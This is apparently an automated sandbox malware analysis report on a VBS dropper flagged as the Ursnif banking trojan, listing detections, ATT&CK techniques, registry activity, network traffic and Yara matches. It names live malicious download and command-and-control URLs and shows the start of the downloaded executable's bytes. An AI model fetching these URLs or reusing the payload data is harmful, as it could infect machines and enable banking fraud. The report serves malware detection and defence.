Loading ...

Play interactive tourEdit tour

Analysis Report Nuovo documento 1.vbs

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:224946
Start date:23.04.2020
Start time:20:11:26
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 52s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Nuovo documento 1.vbs
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:27
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.evad.winVBS@35/66@14/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 7.4% (good quality ratio 7.4%)
  • Quality average: 88.6%
  • Quality standard deviation: 20.2%
HCA Information:
  • Successful, ratio: 82%
  • Number of executed functions: 49
  • Number of non-executed functions: 23
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .vbs
Warnings:
Show All
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, dllhost.exe, ielowutil.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 2.18.68.82, 205.185.216.42, 205.185.216.10, 104.76.47.40, 152.199.19.161, 23.61.220.90
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ie9comview.vo.msecnd.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, site-cdn.onenote.net.edgekey.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e5684.g.akamaiedge.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, go.microsoft.com.edgekey.net, prod.fs.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Ursnif
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation21Scheduled Task1Process Injection112Software Packing21Input Capture1System Time Discovery1Remote File Copy12Input Capture1Data Encrypted1Remote File Copy12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaPowerShell1Port MonitorsScheduled Task1Disabling Security Tools1Network SniffingAccount Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Cryptographic Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesScripting21Accessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureSecurity Software Discovery21Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExecution through API3System FirmwareDLL Search Order HijackingScripting21Credentials in FilesFile and Directory Discovery1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol13SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationExploitation for Client Execution1Shortcut ModificationFile System Permissions WeaknessObfuscated Files or Information2Account ManipulationSystem Information Discovery23Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User Interface1Modify Existing ServiceNew ServiceMasquerading1Brute ForceQuery Registry1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScheduled Task1Path InterceptionScheduled TaskVirtualization/Sandbox Evasion2Two-Factor Authentication InterceptionVirtualization/Sandbox Evasion2Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionProcess Injection112Bash HistoryProcess Discovery2Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess InjectionInput PromptApplication Window Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationScriptingKeychainSystem Owner/User Discovery1Taint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact
Hardware AdditionsExecution through APIFile System Permissions WeaknessValid AccountsIndicator Removal from ToolsPrivate KeysRemote System Discovery1Replication Through Removable MediaVideo CaptureStandard Application Layer ProtocolCommunication Through Removable MediaDisk Structure Wipe

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: http://rolandojgarcia.com/pagigpy75.phpVirustotal: Detection: 10%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Nuovo documento 1.vbsVirustotal: Detection: 10%Perma Link
Source: Nuovo documento 1.vbsReversingLabs: Detection: 12%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exeJoe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 4.2.PaintHelper.exe.710000.1.unpackAvira: Label: TR/Patched.Ren.Gen
Source: 4.2.PaintHelper.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

Spreading:

barindex
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior

Networking:

barindex
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 Apr 2020 18:13:25 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 845368Content-Disposition: attachment; filename=2_exx.binKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 63 73 a1 5e 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 96 01 00 00 3e 0b 00 00 00 00 00 a0 9a 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 0d 00 00 04 00 00 ee f7 0c 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 c4 0c 00 a0 00 00 00 00 e0 0c 00 e0 22 00 00 00 00 00 00 00 00 00 00 00 d8 0c 00 38 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 c7 0c 00 c4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 63 95 01 00 00 10 00 00 00 96 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 08 01 0b 00 00 b0 01 00 00 02 0b 00 00 9a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e0 16 00 00 00 c0 0c 00 00 18 00 00 00 9c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 22 00 00 00 e0 0c 00 00 24 00 00 00 b4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Downloads filesShow sources
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\CJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /pagigpy75.php HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: SanAntonioHost: rolandojgarcia.com
Found strings which match to known social media urlsShow sources
Source: msapplication.xml1.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x665a6569,0x01d619e6</date><accdate>0x665a6569,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x665a6569,0x01d619e6</date><accdate>0x665a6569,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x66625dfb,0x01d619e6</date><accdate>0x66625dfb,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x66625dfb,0x01d619e6</date><accdate>0x66625dfb,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6664e69a,0x01d619e6</date><accdate>0x6664e69a,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.7.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6664e69a,0x01d619e6</date><accdate>0x66675b7d,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: rolandojgarcia.com
Urls found in memory or binary dataShow sources
Source: wscript.exe, 00000000.00000003.698903893.000002A5A1CBC000.00000004.00000001.sdmp, PaintHelper.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: wscript.exe, 00000000.00000003.698903893.000002A5A1CBC000.00000004.00000001.sdmp, PaintHelper.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: wscript.exe, 00000000.00000003.698903893.000002A5A1CBC000.00000004.00000001.sdmp, PaintHelper.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
Source: wscript.exe, 00000000.00000003.698787006.000002A59A69C000.00000004.00000001.sdmpString found in binary or memory: http://rolandojgarcia.com/
Source: wscript.exe, 00000000.00000003.698787006.000002A59A69C000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.715171781.000002A59A6E6000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.698583864.000002A59A6E5000.00000004.00000001.sdmpString found in binary or memory: http://rolandojgarcia.com/pagigpy75.php
Source: wscript.exe, 00000000.00000003.698787006.000002A59A69C000.00000004.00000001.sdmpString found in binary or memory: http://rolandojgarcia.com/pagigpy75.php2
Source: wscript.exe, 00000000.00000003.712803748.000002A59C860000.00000004.00000001.sdmpString found in binary or memory: http://rolandojgarcia.com/pagigpy75.php:
Source: wscript.exe, 00000000.00000003.712104779.000002A59A61B000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.714791320.000002A59A61C000.00000004.00000001.sdmpString found in binary or memory: http://rolandojgarcia.com/pagigpy75.phpO5?
Source: wscript.exe, 00000000.00000003.712104779.000002A59A61B000.00000004.00000001.sdmpString found in binary or memory: http://rolandojgarcia.com/pagigpy75.php_______Set
Source: msapplication.xml.7.drString found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.7.drString found in binary or memory: http://www.google.com/
Source: msapplication.xml3.7.drString found in binary or memory: http://www.live.com/
Source: msapplication.xml4.7.drString found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.7.drString found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.7.drString found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.7.drString found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.7.drString found in binary or memory: http://www.youtube.com/
Source: PaintHelper.exe, 00000004.00000003.714383775.00000000033E0000.00000004.00000040.sdmpString found in binary or memory: https://barecao.xyz
Source: imagestore.dat.7.drString found in binary or memory: https://barecao.xyz/favicon.ico
Source: PaintHelper.exe, 00000004.00000003.879173344.0000000000887000.00000004.00000001.sdmp, PaintHelper.exe, 00000004.00000002.993292410.0000000000D90000.00000002.00000001.sdmp, ~DF4F1F8F6F4B10894B.TMP.7.drString found in binary or memory: https://barecao.xyz/index.htm
Source: {A7B24F44-85D9-11EA-AAE5-44C1B3FB757B}.dat.7.drString found in binary or memory: https://barecao.xyz/index.htmRoot
Source: {A7B24F44-85D9-11EA-AAE5-44C1B3FB757B}.dat.7.drString found in binary or memory: https://barecao.xyz/index.htmdex.htm
Source: wscript.exe, 00000000.00000003.698903893.000002A5A1CBC000.00000004.00000001.sdmp, PaintHelper.exe.0.drString found in binary or memory: https://sectigo.com/CPS0C
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.714383775.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719495034.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716679919.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.714965520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716504979.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720170005.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.713227207.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715552523.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716343079.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.709062333.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719801339.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.710475610.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719652778.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.713639378.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720057377.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719930329.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715968226.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.714019466.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.712856726.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.798832924.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715250270.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715740770.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.711519545.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719176551.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.711997884.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716177520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.708287654.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.994090175.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720225537.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.711015828.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.709810981.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.712422696.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.714678858.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720304550.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: PaintHelper.exe PID: 4196, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: PaintHelper.exe, 00000004.00000002.993083088.0000000000800000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.714383775.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719495034.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716679919.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.714965520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716504979.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720170005.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.713227207.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715552523.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716343079.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.709062333.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719801339.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.710475610.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719652778.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.713639378.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720057377.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719930329.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715968226.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.714019466.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.712856726.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.798832924.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715250270.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.715740770.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.711519545.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.719176551.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.711997884.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.716177520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.708287654.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.994090175.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720225537.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.711015828.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.709810981.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.712422696.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.714678858.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.720304550.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
